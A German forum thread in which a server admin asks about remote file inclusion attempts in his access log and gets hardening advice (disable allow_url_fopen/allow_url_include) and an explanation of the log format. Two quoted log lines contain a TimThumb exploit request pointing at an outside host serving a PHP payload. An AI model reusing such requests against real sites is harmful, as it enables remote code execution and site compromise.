Remote File Inlusion - Angriffe von meinem Server

Feanwulf

Member
Hallo,

anscheinend wird über meinen Server ab und zu) seit wenigen Tagen (also seit gestern) ein Remote File Intrusion auf anderen Serverv versucht.

In den Logfiles finde ich:

web-ng:/var/log/httpd# grep taxo /var/log/httpd/ispconfig_access_log_2012_01_19
localhost||||1229||||78.46.75.84 - - [19/Jan/2012:23:18:41 +0100] "GET /?q=taxonomy/term/4//wp-content/themes/manifesto/scripts//timthumb.php%3fsrc=http://img.youtube.com.ericharland.net/bogel.php HTTP/1.1" 200 1229 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"

localhost||||1229||||78.46.75.84 - - [19/Jan/2012:23:18:43 +0100] "GET /?q=taxonomy/term//wp-content/themes/manifesto/scripts//timthumb.php%3fsrc=http://img.youtube.com.ericharland.net/bogel.php HTTP/1.1" 200 1229 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"

Ich benutze ISPConfig 2 (daher der Pfad zu der Logdatei)

Kann mir jemand erklären wie ich:

localhost||||1229||||78.46.75.84

deuten muss

also localhost scheint klar - dahinter die IP Adresse meines Servers
Aber die Zahl dazwischen kann ich nicht zuordnen!
 

Till

Administrator
anscheinend wird über meinen Server ab und zu) seit wenigen Tagen (also seit gestern) ein Remote File Intrusion auf anderen Serverv versucht.

Schau mal in die php.ini Datei, es sollte URL Fopen und URL Include ausgeschaltet sein.

Aber die Zahl dazwischen kann ich nicht zuordnen!

Das ist die Größe der heruntergeladenen Daten in Bytes und wird zur Erstellung der Trafficstatistik verwendet.
 

Feanwulf

Member
Allow_url_fopen hab ich auf off (das hatte ich beim googlen gefunden)
aber include muss ich nachher schauen (das war mir nicht bekannt)

DANKE
 

Werbung

Top